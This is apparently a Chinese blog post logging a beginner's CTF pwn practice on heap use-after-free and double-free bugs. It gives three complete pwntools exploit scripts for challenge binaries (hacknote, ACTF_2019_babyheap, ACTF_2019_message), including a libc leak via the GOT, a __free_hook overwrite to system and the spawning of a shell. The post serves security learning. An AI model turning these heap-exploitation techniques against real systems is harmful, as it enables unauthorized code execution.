uaf和double free

前言

最近开始打算入门堆,简单记录几道相关的题。

hitcontraining-uaf

题目较为简单存在后门函数,利用uaf漏洞攻击即可。

exp

from pwn import *
local_file  = './hacknote'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
debug = 0
if debug:
    io = process(local_file)
    libc = ELF(local_libc)
else:
    io = remote('node3.buuoj.cn',27892)
    libc = ELF(remote_libc)

elf = ELF(local_file)
libc = elf.libc
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux','splitw','-h']#,'neww'

s      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
sea     = lambda delim,data         :io.sendafter(delim, data)
r      = lambda numb=4096          :io.recv(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :io.info(tag + ': {:#x}'.format(addr))
itr     = lambda                    :io.interactive()
def dbg():
    # gdb.attach(proc.pidof(io)[0],gdbscript="b main")
    gdb.attach(io)
    pause()

def add(size,content):
    sl('1')
    ru('Note size ')
    sl(str(size))
    ru('Content :')
    sl(str(content))

def dele(index):
    sl('2')
    sl(str(index))
def show(index):
    sl('3')
    sl(str(index))
ru('Your choice :')
add(16,'aaaa')
ru('Your choice :')
add(16,'bbbb')
ru('Your choice :')
dele(0)
ru('Your choice :')
dele(1)
ru('Your choice :')
add(8,p32(elf.symbols['magic']))
ru('Your choice :')
show(0)
itr()

ACTF_2019_babyheap

题目有system函数,并且也有/bin/sh\x00 ,当时在构造这个/bin/sh\x00的字符串指针的时候费了一点劲,结果发现elf有这个字符串。然后就很简单了,控制好参数即可。还是uaf漏洞进行攻击。

exp

from pwn import *
local_file  = './ACTF_2019_babyheap'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
debug = 1 
if debug:
    io = process(local_file)
    libc = ELF(local_libc)
else:
    io = remote('node3.buuoj.cn',27341)
    libc = ELF(remote_libc)

elf = ELF(local_file)
libc = elf.libc
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux','splitw','-h']#,'neww'

s      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
sea     = lambda delim,data         :io.sendafter(delim, data)
r      = lambda numb=4096          :io.recv(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :io.info(tag + ': {:#x}'.format(addr))
itr     = lambda                    :io.interactive()
def dbg():
    # gdb.attach(proc.pidof(io)[0],gdbscript="b main")
    gdb.attach(io)
    pause()

def add(size,content):
    sla('Your choice: ','1')
    sla('size: \n',str(size))
    sa('content: \n',str(content)) 
def dele(index):
    sla(': ','2')
    sla('index: \n',str(index))
def show(index):
    sla(': ','3')
    sla('index: \n',str(index))

add(32,'aaaaaaaa') #0
add(32,'bbbbbbbb') #1
dele(0)
dele(1)
binsh = 0x602010
add(16,flat(binsh,elf.plt['system']))
# dbg()
show(0)
itr()

actf-2019-message

Double free,迁移到伪造的堆块,注意控制好伪造堆块的size跟fastbin的对应。
__free_hook为system即可。__free_hook的参数正好是堆块的date,较好控制。
(buu给的复现环境是18的,有了tcache机制,但是本人还不太熟悉,只是知道不检查size是否对应了,在16上做的,然后就调试改了改脚本,打通了buu的复现环境。下面的exp也是18的。)

exp

from pwn import *
local_file  = './ACTF_2019_message'
# local_libc  = '/lib/x86_64-linux-gnu/libc-2.27.so'
# remote_libc = local_libc # '../libc.so.6'
debug = 1
if debug:
    io = process(local_file)
    # libc = ELF(local_libc)
else:
    io = remote('node3.buuoj.cn',25390)
    # libc = ELF(remote_libc)

elf = ELF(local_file)
libc = elf.libc
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux','splitw','-h']#,'neww'

s      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
sea     = lambda delim,data         :io.sendafter(delim, data)
r      = lambda numb=4096          :io.recv(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :io.info(tag + ': {:#x}'.format(addr))
itr     = lambda                    :io.interactive()
def dbg():
    # gdb.attach(proc.pidof(io)[0],gdbscript="b main")
    gdb.attach(io)
    pause()

def add(length,contend) :
    sla('choice: ','1')
    sla('length of message:\n',str(length))
    sa('message:\n',str(contend))
def free(index):
    sla('choice: ','2')
    sla('to delete:\n',str(index))
def edit(index,contend):
    sla('choice: ','3')
    sla('to edit:\n',str(index))
    sa('the message:\n',str(contend))

def show(index):
    sla('choice: ','4')
    sla('to display:\n',str(index))


add(0x30,'a') #0
add(0x20,'a') #1
add(0x20,'a') #2
free(1)
free(2)
free(1)

add(0x20,p64(0x602068))
add(0x20,'aaaaaaaa')
add(0x20,'aaaaaaaa')
contend = p64(elf.got['puts'])# + p64(0x30) + p64(elf.got['puts'])
add(0x20,contend)
show(0)
ru(' message: ')
puts = uu64(r(6))
libc_base = puts - libc.symbols['puts']
free_hook = libc_base + libc.symbols['__free_hook']
print('puts' + hex(puts))
print('libc_base' + hex(libc_base))
system = libc_base + libc.symbols['system']
contend = p64(free_hook)
dbg()
edit(6,contend)
# dbg()
contend = p64(system)
edit(0,contend)
# dbg()
add(0x8,'/bin/sh\x00')
free(7)
itr()


pwn 学习记录

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!